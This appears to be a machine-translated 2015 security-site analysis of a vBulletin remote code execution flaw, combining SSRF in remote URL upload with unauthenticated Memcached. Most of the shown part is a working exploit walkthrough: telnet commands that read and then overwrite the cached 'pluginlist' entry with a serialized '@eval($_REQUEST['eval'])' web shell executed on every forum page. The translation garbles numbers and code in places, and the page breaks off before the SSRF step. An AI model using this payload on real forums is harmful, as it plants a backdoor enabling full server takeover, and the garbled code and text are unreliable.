vBulletin rce 0day analysis-vulnerability warning-the black bar safety net

2015-08-29T00:00:00
ID MYHACK58:62201566323
Type myhack58
Reporter 路人甲
Modified 2015-08-29T00:00:00

Description

vBulletin is the leading foreign Forum program, the domestic generally referred to as VBB, based on PHP+mySQL development. vBulletin is commercial software, you pay to use. vBulletin allows by URL remote Upload file, but the URL and not as a strict filter, resulting in SSRF vulnerability. Plus many vBulletin sites at the same time the vBulletin Memcached withthe WEB serverinstalled together, the combination of SSRF will lead to vulnerability becomes the command execution. 0x01 vulnerability analysis First of all talk about the next vBulletin plugin(hook)implementation, vBulletin the plugin information(including code)stored in the database, the application run time temporary read from the database code execution, can be understood to include 'pluginname.php'into the eval(getCodeFromDB('pluginname')) in. In the Memcache open the case, vBulletin would be the plugin's code is cached in Memcached to increase the Read speed. We all know that access to Memcached is does not require a password, so that if the Memcached access port exposed to the public, we will modify the vBulletin in Memcached in the plugin code is malicious code, which led to the consequences will be dire. vBulletin official site of the proposal is Memcached not and vBulletin installed on the same servers, but many of the webmasters of this or turn a blind eye, or only by the firewall to set the Memcached Port to external disable access to it is thought to solve the problem. Unfortunately, vBulletin in the presence of a SSRF vulnerability, an attacker may be gaps in the file as the proxy to the server on the Memcached initiates a local request. Memcached is not authorized to access We first look at Memcached unauthorized access is how to cause the vBulletin command execution. Through the keyword search, found that the statement vBulletinHook::set_pluginlist($vbulletin->pluginlist), find set_pluginlist statement in the file./ includes/class_hook. php, according to the annotation content: // to call a hook: // require_once(DIR . '/includes/class_hook.php'); // ($hook = vBulletinHook::fetch_hook('unique_hook_name')) ? eval($hook) : false; That, the plugin is called for($hook = vBulletinHook::fetch_hook('unique_hook_name')) ? eval($hook) : false; function is to obtain the plugin code and executed. We use a higher frequency of occurrence of global_start code, The corresponding statement is($hook = vBulletinHook::fetch_hook('global_start')) ? eval($hook) : false; this sentence in./ global. php file, it is included./ global. the php page will include our malicious code. The next access to the Memcached Server see the pluginlist entry of data $ telnet 172.16.80.156 1 1 2 1 1 Trying 172.16.80.156... Connected to 172.16.80.156. Escape character is '^]'. get pluginlist ...(Serialized array) END quit ! Get pluginlist. data will return the serialized pluginlist array. The relevant code in./ includes/class_hook. php class function build_datastore. $plugins = $dbobject->query_read(" SELECT plugin.*, IF(product. the productid IS NULL, 0, 1) AS foundproduct, IF(plugin. product = 'vbulletin', 1, product. active) AS productactive FROM " . TABLE_PREFIX . "plugin AS plugin LEFT JOIN " . TABLE_PREFIX . "product AS product ON(product. productid = plugin. product) WHERE plugin. active = 1 The AND plugin." . "phpcode" ORDER BY plugin. executionorder ASC "); while ($plugin = $dbobject->fetch_array($plugins)) { if ($plugin['foundproduct'] AND !$ plugin['productactive']) { continue; } else if (! empty($adminlocations["$plugin[hookname]"])) { $admincode["$plugin[hookname]"] .= the "$plugin[phpcode]\r\n"; } else { $code["$plugin[hookname]"] .= the "$plugin[phpcode]\r\n"; } } $dbobject->free_result($plugins);

build_datastore('pluginlist', serialize($code), 1); build_datastore('pluginlistadmin', serialize($admincode), 1); Through the code shows that the$code array in the format$code=array('hookname'=>'phpcode'); we want to modify the Memcached in the pluginlist code, we also need to translate our code into$code within the array serialized and then written to Memcached and. $code=array('global_start'=>'@eval($_REQUEST[\'eval\']);'); echo serialize($code)."\ n". strlen(serialize($code)); Output: a:1:{s:1 2:"global_start";s:2 and 5:"@eval($_REQUEST['eval']);";} //serialize post data 5 9 //string length The next step is to modify the pluginlist entry of data for our pluginlist: the $ telnet 172.16.80.156 1 1 2 1 1 Trying 172.16.80.156... Connected to 172.16.80.156. Escape character is '^]'. set pluginlist 0 1 2 0 5 9 a:1:{s:1 2:"global_start";s:2 and 5:"@eval($_REQUEST['eval']);";} STORED quit !

[1] [2] next